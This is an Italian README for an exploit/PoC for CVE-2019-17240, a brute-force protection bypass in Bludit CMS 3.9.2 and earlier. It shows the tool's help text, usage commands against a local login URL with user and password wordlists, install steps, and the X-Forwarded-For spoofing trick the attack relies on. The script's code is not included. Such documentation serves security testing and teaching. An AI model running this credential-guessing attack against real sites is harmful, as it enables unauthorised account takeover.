
Bludit <= 3.9.2 - Exploit/PoC per il bypass della mitigazione del brute force dell'autenticazione
Codice exploit per CVE-2019-17240 noto anche come Bypass della mitigazione brute-force di Bludit <= 3.9.2
Link exploit: [ExploitDB-48942] [PacketStorm]
Risultato atteso: scoprire le credenziali di accesso, bypassando il meccanismo brute-force sull'host che esegue Bludit <= 3.9.2
Destinato esclusivamente a scopi educativi e di test in ambienti aziendali.
Questo exploit è stato testato su Python 3.8.6
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
Installazione:
pip3 install pwn
pip3 install requests
Questo exploit richiede tre input utente :
Utilizzo dell'exploit in cui il nome utente in user.txt viene abbinato a ogni password in pass.txt e inviato al login:

I valori vengono inviati nell'header X-Forwarded-For da pass.txt; se l'elenco contiene un numero ridotto di password, è probabile che una parola venga bloccata dal server; in tal caso lo script mostrerà la parola bloccata nell'output:

In caso di login riuscito, verrà mostrato il seguente output con le credenziali funzionanti:

Questo è un exploit per la vulnerabilità trovata da Rastating su Bludit CMS.
Spiegazione della vulnerabilità: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.